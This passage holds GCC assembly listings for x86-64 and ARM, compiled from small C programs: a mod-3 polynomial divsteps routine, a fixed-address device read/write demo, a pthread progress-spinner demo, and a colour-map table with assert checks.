#-8] ldr r3, [r3] ldr r3, [r3, #8] ldr r3, [r3, #12] ldr r0, [fp, #-8] blx r3 mov r3, r0 mov r1, r3 ldr r0, .L12+4 bl printf mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L13: .align 2 .L12: .word Pekinese_metadata .word .LC3 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "752365.c" .intel_syntax noprefix .text .globl jump16divsteps_mod3 .type jump16divsteps_mod3, @function jump16divsteps_mod3: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 176 mov DWORD PTR -148[rbp], edi mov QWORD PTR -160[rbp], rsi mov QWORD PTR -168[rbp], rdx mov QWORD PTR -176[rbp], rcx mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rcx, QWORD PTR -176[rbp] mov rdx, QWORD PTR -168[rbp] lea rsi, -112[rbp] mov eax, DWORD PTR -148[rbp] mov edi, eax call jump8divsteps_mod3@PLT mov DWORD PTR -148[rbp], eax mov rax, QWORD PTR -176[rbp] lea rcx, 8[rax] mov rax, QWORD PTR -168[rbp] lea rdx, 8[rax] lea rsi, -112[rbp] lea rax, -144[rbp] mov rdi, rax call __gf_polymul_8x8_2x2_x2p2_mod3@PLT lea rax, -144[rbp] add rax, 16 lea rdx, -144[rbp] lea rsi, -64[rbp] mov edi, DWORD PTR -148[rbp] mov rcx, rax call jump8divsteps_mod3@PLT mov DWORD PTR -148[rbp], eax lea rdx, -144[rbp] add rdx, 24 lea rax, -144[rbp] add rax, 8 lea rsi, -64[rbp] mov rdi, QWORD PTR -160[rbp] mov rcx, rdx mov rdx, rax call __gf_polymul_8x8_2x2_x2p2_mod3@PLT lea rdx, -64[rbp] add rdx, 16 lea rax, -112[rbp] add rax, 16 mov rcx, QWORD PTR -160[rbp] add rcx, 32 mov rsi, rax mov rdi, rcx call __gf_polymul_8x8_2x2_x_2x2_mod3@PLT mov eax, DWORD PTR -148[rbp] mov rdi, QWORD PTR -8[rbp] sub rdi, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size jump16divsteps_mod3, .-jump16divsteps_mod3 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "752365.c" .text .section .rodata .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global jump16divsteps_mod3 .syntax unified .arm .fpu softvfp .type jump16divsteps_mod3, %function jump16divsteps_mod3: @ args = 0, pretend = 0, frame = 152 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #152 str r0, [fp, #-144] str r1, [fp, #-148] str r2, [fp, #-152] str r3, [fp, #-156] ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r1, fp, #104 ldr r3, [fp, #-156] ldr r2, [fp, #-152] ldr r0, [fp, #-144] bl jump8divsteps_mod3 str r0, [fp, #-144] ldr r3, [fp, #-152] add r2, r3, #8 ldr r3, [fp, #-156] add r3, r3, #8 sub r1, fp, #104 sub r0, fp, #136 bl __gf_polymul_8x8_2x2_x2p2_mod3 sub r3, fp, #136 add r3, r3, #16 sub r2, fp, #136 sub r1, fp, #56 ldr r0, [fp, #-144] bl jump8divsteps_mod3 str r0, [fp, #-144] sub r2, fp, #136 add r2, r2, #8 sub r3, fp, #136 add r3, r3, #24 sub r1, fp, #56 ldr r0, [fp, #-148] bl __gf_polymul_8x8_2x2_x2p2_mod3 ldr r3, [fp, #-148] add r0, r3, #32 sub r3, fp, #104 add r3, r3, #16 sub r2, fp, #56 add r2, r2, #16 mov r1, r3 bl __gf_polymul_8x8_2x2_x_2x2_mod3 ldr r3, [fp, #-144] ldr r2, .L4 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L3 bl __stack_chk_fail .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L5: .align 2 .L4: .word .LC0 .size jump16divsteps_mod3, .-jump16divsteps_mod3 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "631401.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Hello: starting" .LC1: .string "Hello: read device" .LC2: .string "Hello: write device" .LC3: .string "Hello: done" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov eax, 3221225472 mov QWORD PTR -24[rbp], rax mov eax, 3221229567 mov QWORD PTR -16[rbp], rax mov eax, 3221229568 mov QWORD PTR -8[rbp], rax lea rdi, .LC0[rip] call puts@PLT lea rdi, .LC1[rip] call puts@PLT mov rax, QWORD PTR -24[rbp] movzx eax, BYTE PTR [rax] mov BYTE PTR -25[rbp], al lea rdi, .LC2[rip] call puts@PLT mov rax, QWORD PTR -16[rbp] movzx edx, BYTE PTR -25[rbp] mov BYTE PTR [rax], dl lea rdi, .LC3[rip] call puts@PLT mov rax, QWORD PTR -8[rbp] mov BYTE PTR [rax], 0 mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "631401.c" .text .section .rodata .align 2 .LC0: .ascii "Hello: starting\000" .align 2 .LC1: .ascii "Hello: read device\000" .align 2 .LC2: .ascii "Hello: write device\000" .align 2 .LC3: .ascii "Hello: done\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 mov r3, #-1073741824 str r3, [fp, #-16] ldr r3, .L3 str r3, [fp, #-12] ldr r3, .L3+4 str r3, [fp, #-8] ldr r0, .L3+8 bl puts ldr r0, .L3+12 bl puts ldr r3, [fp, #-16] ldrb r3, [r3] strb r3, [fp, #-17] ldr r0, .L3+16 bl puts ldr r3, [fp, #-12] ldrb r2, [fp, #-17] strb r2, [r3] ldr r0, .L3+20 bl puts ldr r3, [fp, #-8] mov r2, #0 strb r2, [r3] mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L4: .align 2 .L3: .word -1073737729 .word -1073737728 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "598360.c" .intel_syntax noprefix .text .globl tids .bss .align 8 .type tids, @object .size tids, 8 tids: .zero 8 .globl lock .align 32 .type lock, @object .size lock, 40 lock: .zero 40 .section .rodata .LC0: .string "Processing: %3d%%\r" .LC1: .string "Processing: " .LC2: .string "%c\b" .LC3: .string "\nThread %d processing done\n" .text .globl doSomeThing .type doSomeThing, @function doSomeThing: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -40[rbp], rdi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdi, lock[rip] call pthread_mutex_lock@PLT mov QWORD PTR -24[rbp], 0 mov DWORD PTR -13[rbp], 1546465148 mov BYTE PTR -9[rbp], 0 mov QWORD PTR -24[rbp], 0 jmp .L2 .L3: mov rax, QWORD PTR -24[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR stdout[rip] mov rdi, rax call fflush@PLT mov edi, 1000 call usleep@PLT add QWORD PTR -24[rbp], 10 .L2: cmp QWORD PTR -24[rbp], 99 jbe .L3 mov edi, 10 call putchar@PLT mov rax, QWORD PTR stdout[rip] mov rdi, rax call fflush@PLT lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov QWORD PTR -24[rbp], 0 jmp .L4 .L5: mov rax, QWORD PTR -24[rbp] movabs rdx, -3689348814741910323 mul rdx mov rcx, rdx shr rcx, 3 movabs rdx, -3689348814741910323 mov rax, rcx mul rdx mov rax, rdx shr rax, 2 mov rdx, rax sal rdx, 2 add rdx, rax mov rax, rcx sub rax, rdx movzx eax, BYTE PTR -13[rbp+rax] movsx eax, al mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR stdout[rip] mov rdi, rax call fflush@PLT mov edi, 1000 call usleep@PLT add QWORD PTR -24[rbp], 10 .L4: cmp QWORD PTR -24[rbp], 99 jbe .L5 mov edi, 10 call putchar@PLT mov rax, QWORD PTR stdout[rip] mov rdi, rax call fflush@PLT mov rax, QWORD PTR -40[rbp] mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT lea rdi, lock[rip] call pthread_mutex_unlock@PLT mov eax, 0 mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L7 call __stack_chk_fail@PLT .L7: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size doSomeThing, .-doSomeThing .section .rodata .LC4: .string "\n mutex init failed" .LC5: .string "error with realloc" .LC6: .string "\ncan't create thread :[%s]" .align 8 .LC7: .string "\n Thread %d created successfully\n" .text .globl main .type main, @function main: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 24 .cfi_offset 3, -24 mov DWORD PTR -24[rbp], 0 mov edi, 16 call malloc@PLT mov QWORD PTR tids[rip], rax mov rbx, QWORD PTR tids[rip] mov edi, 8 call malloc@PLT mov QWORD PTR [rbx], rax mov rax, QWORD PTR tids[rip] mov DWORD PTR 8[rax], 0 mov esi, 0 lea rdi, lock[rip] call pthread_mutex_init@PLT test eax, eax je .L11 lea rdi, .LC4[rip] call puts@PLT mov eax, 1 jmp .L10 .L15: mov rax, QWORD PTR tids[rip] mov eax, DWORD PTR 8[rax] test eax, eax je .L12 mov rax, QWORD PTR tids[rip] mov eax, DWORD PTR 8[rax] add eax, 1 cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR tids[rip] mov rax, QWORD PTR [rax] mov rbx, QWORD PTR tids[rip] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR [rbx], rax mov rax, QWORD PTR tids[rip] test rax, rax jne .L12 lea rdi, .LC5[rip] mov eax, 0 call printf@PLT .L12: mov rax, QWORD PTR tids[rip] mov eax, DWORD PTR 8[rax] cdqe mov rdx, rax mov rax, QWORD PTR tids[rip] mov rcx, QWORD PTR [rax] mov rax, QWORD PTR tids[rip] mov eax, DWORD PTR 8[rax] cdqe sal rax, 3 add rax, rcx mov rcx, rdx lea rdx, doSomeThing[rip] mov esi, 0 mov rdi, rax call pthread_create@PLT mov DWORD PTR -20[rbp], eax cmp DWORD PTR -20[rbp], 0 je .L13 mov eax, DWORD PTR -20[rbp] mov edi, eax call strerror@PLT mov rsi, rax lea rdi, .LC6[rip] mov eax, 0 call printf@PLT jmp .L14 .L13: mov rax, QWORD PTR tids[rip] mov eax, DWORD PTR 8[rax] mov esi, eax lea rdi, .LC7[rip] mov eax, 0 call printf@PLT .L14: mov rax, QWORD PTR tids[rip] mov edx, DWORD PTR 8[rax] add edx, 1 mov DWORD PTR 8[rax], edx add DWORD PTR -24[rbp], 1 .L11: cmp DWORD PTR -24[rbp], 8 jle .L15 mov DWORD PTR -24[rbp], 0 jmp .L16 .L17: mov rax, QWORD PTR tids[rip] mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -24[rbp] cdqe sal rax, 3 add rax, rdx mov rax, QWORD PTR [rax] mov esi, 0 mov rdi, rax call pthread_join@PLT mov rax, QWORD PTR tids[rip] mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -24[rbp] cdqe sal rax, 3 add rax, rdx mov rax, QWORD PTR [rax] mov esi, 0 mov rdi, rax call pthread_join@PLT add DWORD PTR -24[rbp], 1 .L16: mov rax, QWORD PTR tids[rip] mov eax, DWORD PTR 8[rax] cmp DWORD PTR -24[rbp], eax jl .L17 lea rdi, lock[rip] call pthread_mutex_destroy@PLT mov eax, 0 .L10: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "598360.c" .text .comm tids,4,4 .comm lock,24,4 .section .rodata .align 2 .LC1: .ascii "Processing: %3d%%\015\000" .align 2 .LC2: .ascii "Processing: \000" .align 2 .LC3: .ascii "%c\010\000" .align 2 .LC4: .ascii "\012Thread %d processing done\012\000" .align 2 .LC0: .ascii "|/-\\\000" .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global doSomeThing .syntax unified .arm .fpu softvfp .type doSomeThing, %function doSomeThing: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] ldr r3, .L8 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r0, .L8+4 bl pthread_mutex_lock mov r3, #0 str r3, [fp, #-20] ldr r2, .L8+8 sub r3, fp, #16 ldm r2, {r0, r1} str r0, [r3] add r3, r3, #4 strb r1, [r3] mov r3, #0 str r3, [fp, #-20] b .L2 .L3: ldr r1, [fp, #-20] ldr r0, .L8+12 bl printf ldr r3, .L8+16 ldr r3, [r3] mov r0, r3 bl fflush mov r0, #1000 bl usleep ldr r3, [fp, #-20] add r3, r3, #10 str r3, [fp, #-20] .L2: ldr r3, [fp, #-20] cmp r3, #99 bls .L3 mov r0, #10 bl putchar ldr r3, .L8+16 ldr r3, [r3] mov r0, r3 bl fflush ldr r0, .L8+20 bl printf mov r3, #0 str r3, [fp, #-20] b .L4 .L5: ldr r3, [fp, #-20] ldr r2, .L8+24 umull r1, r3, r2, r3 lsr r1, r3, #3 ldr r3, .L8+24 umull r2, r3, r1, r3 lsr r2, r3, #2 mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 sub r2, r1, r3 sub r3, fp, #4 add r3, r3, r2 ldrb r3, [r3, #-12] @ zero_extendqisi2 mov r1, r3 ldr r0, .L8+28 bl printf ldr r3, .L8+16 ldr r3, [r3] mov r0, r3 bl fflush mov r0, #1000 bl usleep ldr r3, [fp, #-20] add r3, r3, #10 str r3, [fp, #-20] .L4: ldr r3, [fp, #-20] cmp r3, #99 bls .L5 mov r0, #10 bl putchar ldr r3, .L8+16 ldr r3, [r3] mov r0, r3 bl fflush ldr r1, [fp, #-24] ldr r0, .L8+32 bl printf ldr r0, .L8+4 bl pthread_mutex_unlock mov r3, #0 ldr r2, .L8 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L7 bl __stack_chk_fail .L7: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L9: .align 2 .L8: .word .LC5 .word lock .word .LC0 .word .LC1 .word stdout .word .LC2 .word -858993459 .word .LC3 .word .LC4 .size doSomeThing, .-doSomeThing .section .rodata .align 2 .LC6: .ascii "\012 mutex init failed\000" .align 2 .LC7: .ascii "error with realloc\000" .align 2 .LC8: .ascii "\012can't create thread :[%s]\000" .align 2 .LC9: .ascii "\012 Thread %d created successfully\012\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #12 mov r3, #0 str r3, [fp, #-20] mov r0, #8 bl malloc mov r3, r0 mov r2, r3 ldr r3, .L20 str r2, [r3] ldr r3, .L20 ldr r4, [r3] mov r0, #4 bl malloc mov r3, r0 str r3, [r4] ldr r3, .L20 ldr r3, [r3] mov r2, #0 str r2, [r3, #4] mov r1, #0 ldr r0, .L20+4 bl pthread_mutex_init mov r3, r0 cmp r3, #0 beq .L13 ldr r0, .L20+8 bl puts mov r3, #1 b .L12 .L17: ldr r3, .L20 ldr r3, [r3] ldr r3, [r3, #4] cmp r3, #0 beq .L14 ldr r3, .L20 ldr r3, [r3] ldr r2, [r3] ldr r3, .L20 ldr r3, [r3] ldr r3, [r3, #4] add r3, r3, #1 lsl r3, r3, #2 ldr r1, .L20 ldr r4, [r1] mov r1, r3 mov r0, r2 bl realloc mov r3, r0 str r3, [r4] ldr r3, .L20 ldr r3, [r3] cmp r3, #0 bne .L14 ldr r0, .L20+12 bl printf .L14: ldr r3, .L20 ldr r3, [r3] ldr r2, [r3] ldr r3, .L20 ldr r3, [r3] ldr r3, [r3, #4] lsl r3, r3, #2 add r0, r2, r3 ldr r3, .L20 ldr r3, [r3] ldr r3, [r3, #4] ldr r2, .L20+16 mov r1, #0 bl pthread_create str r0, [fp, #-16] ldr r3, [fp, #-16] cmp r3, #0 beq .L15 ldr r0, [fp, #-16] bl strerror mov r3, r0 mov r1, r3 ldr r0, .L20+20 bl printf b .L16 .L15: ldr r3, .L20 ldr r3, [r3] ldr r3, [r3, #4] mov r1, r3 ldr r0, .L20+24 bl printf .L16: ldr r3, .L20 ldr r3, [r3] ldr r2, [r3, #4] add r2, r2, #1 str r2, [r3, #4] ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L13: ldr r3, [fp, #-20] cmp r3, #8 ble .L17 mov r3, #0 str r3, [fp, #-20] b .L18 .L19: ldr r3, .L20 ldr r3, [r3] ldr r2, [r3] ldr r3, [fp, #-20] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3] mov r1, #0 mov r0, r3 bl pthread_join ldr r3, .L20 ldr r3, [r3] ldr r2, [r3] ldr r3, [fp, #-20] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3] mov r1, #0 mov r0, r3 bl pthread_join ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L18: ldr r3, .L20 ldr r3, [r3] ldr r3, [r3, #4] ldr r2, [fp, #-20] cmp r2, r3 blt .L19 ldr r0, .L20+4 bl pthread_mutex_destroy mov r3, #0 .L12: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L21: .align 2 .L20: .word tids .word lock .word .LC6 .word .LC7 .word doSomeThing .word .LC8 .word .LC9 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "106500.c" .intel_syntax noprefix .text .globl ColorPairsTable .bss .align 32 .type ColorPairsTable, @object .size ColorPairsTable, 600 ColorPairsTable: .zero 600 .globl majorColor .section .rodata .LC0: .string "White " .LC1: .string "Red " .LC2: .string "Black " .LC3: .string "Yellow" .LC4: .string "Violet" .section .data.rel.local,"aw" .align 32 .type majorColor, @object .size majorColor, 40 majorColor: .quad .LC0 .quad .LC1 .quad .LC2 .quad .LC3 .quad .LC4 .globl minorColor .section .rodata .LC5: .string "Blue" .LC6: .string "Orange" .LC7: .string "Green" .LC8: .string "Brown" .LC9: .string "Slate" .section .data.rel.local .align 32 .type minorColor, @object .size minorColor, 40 minorColor: .quad .LC5 .quad .LC6 .quad .LC7 .quad .LC8 .quad .LC9 .text .globl FormColorMap .type FormColorMap, @function FormColorMap: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -8[rbp], 0 mov DWORD PTR -4[rbp], 0 mov DWORD PTR -8[rbp], 0 jmp .L2 .L5: mov DWORD PTR -4[rbp], 0 jmp .L3 .L4: mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] lea ecx, [rdx+rax] mov eax, DWORD PTR -8[rbp] cdqe lea rdx, 0[0+rax*8] lea rax, majorColor[rip] mov rdx, QWORD PTR [rdx+rax] movsx rcx, ecx mov rax, rcx add rax, rax add rax, rcx sal rax, 3 mov rcx, rax lea rax, ColorPairsTable[rip] mov QWORD PTR [rcx+rax], rdx mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] lea ecx, [rdx+rax] mov eax, DWORD PTR -4[rbp] cdqe lea rdx, 0[0+rax*8] lea rax, minorColor[rip] mov rdx, QWORD PTR [rdx+rax] movsx rcx, ecx mov rax, rcx add rax, rax add rax, rcx sal rax, 3 mov rcx, rax lea rax, ColorPairsTable[rip+8] mov QWORD PTR [rcx+rax], rdx add DWORD PTR -4[rbp], 1 .L3: cmp DWORD PTR -4[rbp], 4 jle .L4 add DWORD PTR -8[rbp], 1 .L2: cmp DWORD PTR -8[rbp], 4 jle .L5 mov eax, DWORD PTR -8[rbp] imul eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size FormColorMap, .-FormColorMap .section .rodata .LC10: .string " %d | %s | %s\n" .LC11: .string "%d | %s | %s\n" .text .globl printColorMap .type printColorMap, @function printColorMap: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -8[rbp], 0 mov DWORD PTR -4[rbp], 0 mov DWORD PTR -8[rbp], 0 jmp .L8 .L13: mov DWORD PTR -4[rbp], 0 jmp .L9 .L12: mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx cmp eax, 8 jg .L10 mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdx, rax lea rax, ColorPairsTable[rip+8] mov rcx, QWORD PTR [rdx+rax] mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdx, rax lea rax, ColorPairsTable[rip] mov rdx, QWORD PTR [rdx+rax] mov esi, DWORD PTR -8[rbp] mov eax, esi sal eax, 2 add esi, eax mov eax, DWORD PTR -4[rbp] add eax, esi add eax, 1 mov esi, eax lea rdi, .LC10[rip] mov eax, 0 call printf@PLT jmp .L11 .L10: mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdx, rax lea rax, ColorPairsTable[rip+8] mov rcx, QWORD PTR [rdx+rax] mov edx, DWORD PTR -8[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -4[rbp] add eax, edx movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdx, rax lea rax, ColorPairsTable[rip] mov rdx, QWORD PTR [rdx+rax] mov esi, DWORD PTR -8[rbp] mov eax, esi sal eax, 2 add esi, eax mov eax, DWORD PTR -4[rbp] add eax, esi add eax, 1 mov esi, eax lea rdi, .LC11[rip] mov eax, 0 call printf@PLT .L11: add DWORD PTR -4[rbp], 1 .L9: cmp DWORD PTR -4[rbp], 4 jle .L12 add DWORD PTR -8[rbp], 1 .L8: cmp DWORD PTR -8[rbp], 4 jle .L13 mov eax, DWORD PTR -8[rbp] imul eax, DWORD PTR -4[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size printColorMap, .-printColorMap .section .rodata .LC12: .string "the_stack_data/106500.c" .LC13: .string "totalItems == 25" .LC14: .string "result == 25" .align 8 .LC15: .string "ColorPairsTable[0][0] == majorColor[0]" .LC16: .string "Misaligned_Pairs == 0" .LC17: .string "All is well (maybe!)" .text .globl main .type main, @function main: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov eax, 0 call FormColorMap mov DWORD PTR -8[rbp], eax mov eax, 0 call printColorMap mov DWORD PTR -4[rbp], eax mov DWORD PTR -20[rbp], 0 mov DWORD PTR -16[rbp], 0 mov DWORD PTR -12[rbp], 0 mov DWORD PTR -16[rbp], 0 jmp .L16 .L20: mov DWORD PTR -12[rbp], 0 jmp .L17 .L19: mov edx, DWORD PTR -16[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -12[rbp] add eax, edx movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdx, rax lea rax, ColorPairsTable[rip] mov rdx, QWORD PTR [rdx+rax] mov eax, DWORD PTR -16[rbp] cdqe lea rcx, 0[0+rax*8] lea rax, majorColor[rip] mov rax, QWORD PTR [rcx+rax] cmp rdx, rax je .L18 mov edx, DWORD PTR -16[rbp] mov eax, edx sal eax, 2 add edx, eax mov eax, DWORD PTR -12[rbp] add eax, edx movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdx, rax lea rax, ColorPairsTable[rip+8] mov rdx, QWORD PTR [rdx+rax] mov eax, DWORD PTR -12[rbp] cdqe lea rcx, 0[0+rax*8] lea rax, minorColor[rip] mov rax, QWORD PTR [rcx+rax] cmp rdx, rax jne .L18 add DWORD PTR -20[rbp], 1 .L18: add DWORD PTR -12[rbp], 1 .L17: cmp DWORD PTR -12[rbp], 4 jle .L19 add DWORD PTR -16[rbp], 1 .L16: cmp DWORD PTR -16[rbp], 4 jle .L20 cmp DWORD PTR -8[rbp], 25 je .L21 lea rcx, __PRETTY_FUNCTION__.0[rip] mov edx, 46 lea rsi, .LC12[rip] lea rdi, .LC13[rip] call __assert_fail@PLT .L21: cmp DWORD PTR -4[rbp], 25 je .L22 lea rcx, __PRETTY_FUNCTION__.0[rip] mov edx, 47 lea rsi, .LC12[rip] lea rdi, .LC14[rip] call __assert_fail@PLT .L22: mov rdx, QWORD PTR ColorPairsTable[rip] mov rax, QWORD PTR majorColor[rip] cmp rdx, rax je .L23 lea rcx, __PRETTY_FUNCTION__.0[rip] mov edx, 48 lea rsi, .LC12[rip] lea rdi, .LC15[rip] call __assert_fail@PLT .L23: cmp DWORD PTR -20[rbp], 0 je .L24 lea rcx, __PRETTY_FUNCTION__.0[rip] mov edx, 49 lea rsi, .LC12[rip] lea rdi, .LC16[rip] call __assert_fail@PLT .L24: lea rdi, .LC17[rip] call puts@PLT mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size main, .-main .section .rodata .type __PRETTY_FUNCTION__.0, @object .size __PRETTY_FUNCTION__.0, 5 __PRETTY_FUNCTION__.0: .string "main" .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "106500.c" .text .global ColorPairsTable .bss .align 2 .type ColorPairsTable, %object .size ColorPairsTable, 300 ColorPairsTable: .space 300 .global majorColor .section .rodata .align 2 .LC0: .ascii "White \000" .align 2 .LC1: .ascii "Red \000" .align 2 .LC2: .ascii "Black \000" .align 2 .LC3: .ascii "Yellow\000" .align 2 .LC4: .ascii "Violet\000" .data .align 2 .type majorColor, %object .size majorColor, 20 majorColor: .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .global minorColor .section .rodata .align 2 .LC5: .ascii "Blue\000" .align 2 .LC6: .ascii "Orange\000" .align 2 .LC7: .ascii "Green\000" .align 2 .LC8: .ascii "Brown\000" .align 2 .LC9: .ascii 